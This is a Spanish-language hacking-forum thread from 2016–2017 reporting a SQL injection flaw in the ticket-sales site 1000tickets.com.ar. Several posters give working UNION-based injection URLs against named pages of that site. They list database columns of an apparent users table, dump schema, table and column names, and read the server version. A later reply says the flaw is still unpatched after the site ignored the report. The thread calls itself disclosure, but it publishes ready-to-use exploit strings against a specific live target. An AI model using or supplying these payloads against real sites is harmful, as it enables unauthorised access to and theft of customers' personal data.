comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

[ SQLi ] www.1000tickets.com.ar

  • 9 Respuestas
  • 3523 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado HATI

  • *
  • Moderador
  • Mensajes: 421
  • Actividad:
    3.33%
  • Reputación 11
    • Ver Perfil
« en: Febrero 21, 2016, 01:47:53 pm »
****************************************************
   SQLi You are not allowed to view links. Register or Login
****************************************************

> Site: You are not allowed to view links. Register or Login

> Descripción del site: venta de entradas para conciertos y demás.



> Descripción de la vulnerabilidad:

  -Se encuentra un síntoma de vulnerabilidad frente a SQLi.
 
  -Se halla el tipo de inyección y se comprueba manualmente y mediante SQLHelper





  -Tras esto se puede proceder a la búsqueda de información sensible, que puede ser utilizada con fines no éticos.

Tratandose de una página de venta de entradas, la información que contiene esta base de datos puede ser peligrosa si cae en malas manos.

Método manual:





Payload:
Código: You are not allowed to view links. Register or Login
http://www.1000tickets.com.ar/ficha.php?id=7-1+UNION+SELECT+1,2,3,4,group_concat(column_name),6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+information_schema.columns+where+table_name=char(116,98,108,95,117,115,117,97,114,105,111)--
Método automático con SQLHelper:



Vulnerabilidad reportada por la comunidad de Underc0de.

Autor: hati

« Última modificación: Marzo 07, 2016, 03:01:21 am por EPSILON »


Jugar o perder

Desconectado arthusu

  • *
  • Underc0der
  • Mensajes: 531
  • Actividad:
    8.33%
  • Reputación 2
  • Yo solo se que no se nada - Socrátes
    • Ver Perfil
    • Arthusu BLOG
  • Skype: arthusuxD
« Respuesta #1 en: Febrero 21, 2016, 03:10:53 pm »
Código: Text
  1. http://www.1000tickets.com.ar/ficha.php
  2. ?id=-91 union select 1,(select (@a) from (select(@a:=0x00),(select (@a) from (information_schema.columns)where table_schema!=0x696e666f726d6174696f6e5f736368656d61 and(@a)in (@a:=concat(@a,table_schema,0x203e20,table_name,0x3e,column_name,0x3c62723e))))a),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 -- -

Desconectado EPSILON

  • *
  • Underc0der
  • Mensajes: 365
  • Actividad:
    0%
  • Reputación 0
  • epsilon@crypt.am
    • Ver Perfil
  • Skype: epsilon.root1
« Respuesta #2 en: Febrero 21, 2016, 03:34:37 pm »
@You are not allowed to view links. Register or Login a esto le falta el payload si no no cuenta para esta sección, te recomiendo que leas las You are not allowed to view links. Register or Login para poder postear aca los bugs que encuentres, y como concejo deja las tools automatizadas.

Código: Text
  1. http://www.1000tickets.com.ar/ficha.php?id=91+and+1=5+union+select+1,@@version,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+--+

Saludos!, EPSILON
« Última modificación: Febrero 21, 2016, 03:36:18 pm por EPSILON »

Desconectado HATI

  • *
  • Moderador
  • Mensajes: 421
  • Actividad:
    3.33%
  • Reputación 11
    • Ver Perfil
« Respuesta #3 en: Febrero 21, 2016, 09:01:19 pm »
You are not allowed to view links. Register or Login
@You are not allowed to view links. Register or Login a esto le falta el payload si no no cuenta para esta sección, te recomiendo que leas las You are not allowed to view links. Register or Login para poder postear aca los bugs que encuentres, y como concejo deja las tools automatizadas.

Código: Text
  1. http://www.1000tickets.com.ar/ficha.php?id=91+and+1=5+union+select+1,@@version,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+--+

Saludos!, EPSILON


Lo realicé de manera manual también, pero tienes razón en que debería haber puesto el payload, no me di cuenta, problema solucionado.
Gracias por avisar @You are not allowed to view links. Register or Login, ¿podría recibir ayuda para comunicar la vulnerabilidad?


Jugar o perder

Desconectado blackdrake

  • *
  • Co Admin
  • Mensajes: 1893
  • Actividad:
    16.67%
  • Reputación 14
    • Ver Perfil
« Respuesta #4 en: Febrero 22, 2016, 07:54:06 am »
You are not allowed to view links. Register or Login
You are not allowed to view links. Register or Login
@You are not allowed to view links. Register or Login a esto le falta el payload si no no cuenta para esta sección, te recomiendo que leas las You are not allowed to view links. Register or Login para poder postear aca los bugs que encuentres, y como concejo deja las tools automatizadas.

Código: Text
  1. http://www.1000tickets.com.ar/ficha.php?id=91+and+1=5+union+select+1,@@version,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+--+

Saludos!, EPSILON


Lo realicé de manera manual también, pero tienes razón en que debería haber puesto el payload, no me di cuenta, problema solucionado.
Gracias por avisar @You are not allowed to view links. Register or Login, ¿podría recibir ayuda para comunicar la vulnerabilidad?

Quieres reportarlo tu? o que lo haga la comunidad por ti?

Saludos.



Desconectado HATI

  • *
  • Moderador
  • Mensajes: 421
  • Actividad:
    3.33%
  • Reputación 11
    • Ver Perfil
« Respuesta #5 en: Febrero 22, 2016, 08:03:45 am »
Si es posible que la comunidad lo haga por mi lo agradecería @You are not allowed to view links. Register or Login, y también gracias a ti por responderme.


Jugar o perder

Desconectado blackdrake

  • *
  • Co Admin
  • Mensajes: 1893
  • Actividad:
    16.67%
  • Reputación 14
    • Ver Perfil
« Respuesta #6 en: Febrero 22, 2016, 09:47:26 am »
You are not allowed to view links. Register or Login
Si es posible que la comunidad lo haga por mi lo agradecería @You are not allowed to view links. Register or Login, y también gracias a ti por responderme.

Excelente, nos encargamos entonces! :D

Saludos.



Desconectado HATI

  • *
  • Moderador
  • Mensajes: 421
  • Actividad:
    3.33%
  • Reputación 11
    • Ver Perfil
« Respuesta #7 en: Febrero 22, 2016, 11:48:52 am »
@You are not allowed to view links. Register or Login gracias a ti a la comunidad de Underc0de


Jugar o perder

Desconectado xyz

  • *
  • Moderador Global
  • Mensajes: 436
  • Actividad:
    0%
  • Reputación 10
    • Ver Perfil
    • Under0cde
« Respuesta #8 en: Febrero 20, 2017, 07:02:49 pm »
No se si revivir el post.

 La vulnerabilidad sigue activa.

Código: You are not allowed to view links. Register or Login
http://www.1000tickets.com.ar/listado.php?idcat=1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19

Saludos.
« Última modificación: Febrero 20, 2017, 08:08:43 pm por xyz »

Desconectado blackdrake

  • *
  • Co Admin
  • Mensajes: 1893
  • Actividad:
    16.67%
  • Reputación 14
    • Ver Perfil
« Respuesta #9 en: Febrero 21, 2017, 01:35:03 pm »
You are not allowed to view links. Register or Login
No se si revivir el post.

 La vulnerabilidad sigue activa.

Código: You are not allowed to view links. Register or Login
http://www.1000tickets.com.ar/listado.php?idcat=1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19

Saludos.

Si, nunca contestaron al correo y obviamente tampoco lo fixearon xD



 

¿Te gustó el post? COMPARTILO!



[SQLi] leong-leong.com

Iniciado por F0M3T

Respuestas: 0
Vistas: 758
Último mensaje Abril 10, 2013, 02:39:57 am
por F0M3T
Agujero en servidores de BBDD [Hacking Google + SQLi] - www.kanglin.com.tw

Iniciado por baah

Respuestas: 5
Vistas: 1844
Último mensaje Junio 02, 2017, 06:39:33 am
por baah
SQLI Organo Profesional de los Ingenieros de Caminos Canales y Puertos

Iniciado por hdbreaker

Respuestas: 1
Vistas: 1044
Último mensaje Julio 25, 2013, 10:14:56 pm
por F0M3T
SQLI Double Error Based http://campusvirtual.frsf.utn.edu.ar

Iniciado por hdbreaker

Respuestas: 1
Vistas: 1008
Último mensaje Febrero 19, 2013, 06:59:26 pm
por ANTRAX
SQLI Bypass Admin.asp SocArgentina Investigacion Bioquimica e Ing Molecular

Iniciado por hdbreaker

Respuestas: 1
Vistas: 1151
Último mensaje Marzo 12, 2013, 12:46:44 pm
por Cronos